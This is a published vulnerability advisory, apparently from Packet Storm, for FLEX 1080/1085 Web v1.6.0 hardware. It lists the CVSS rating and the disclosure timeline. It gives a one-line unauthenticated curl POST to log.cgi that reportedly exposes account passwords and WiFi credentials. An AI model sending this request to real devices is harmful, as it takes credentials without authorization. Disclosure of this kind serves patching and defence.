Share
## https://sploitus.com/exploit?id=PACKETSTORM:166262
# Exploit Title: FLEX 1080/1085 Web - Information Disclosure  
# Exploit Author: Mr Empy  
# Vendor Homepage: https://www.tem.ind.br/  
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94  
# Version: 1.6.0  
# Tested on: Linux  
  
Title:  
================  
FLEX 1080/1085 Web - Information Disclosure  
  
Summary:  
================  
The FLEX 1080/1085 Web hardware allows the attacker to obtain sensitive  
information such as username and password, WiFi SSID and WiFi password.  
  
  
Severity Level:  
================  
9.1 (Critical)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N  
  
  
Vulnerability Disclosure Schedule:  
============================  
* January 13, 2022: An email was sent to support.  
  
* February 13, 2022: I didn't get any response from support.  
  
* February 14, 2022: Vulnerability Disclosure  
  
  
Affected Product:  
================  
FLEX 1080/1085 Web v1.6.0  
  
  
Steps to Reproduce:  
================  
  
1. Open a terminal and enter the following command:  
  
curl -X POST http://target.com/sistema/log.cgi -d 'force=1'  
  
After that you will be able to see the hardware logs without having any  
authentication.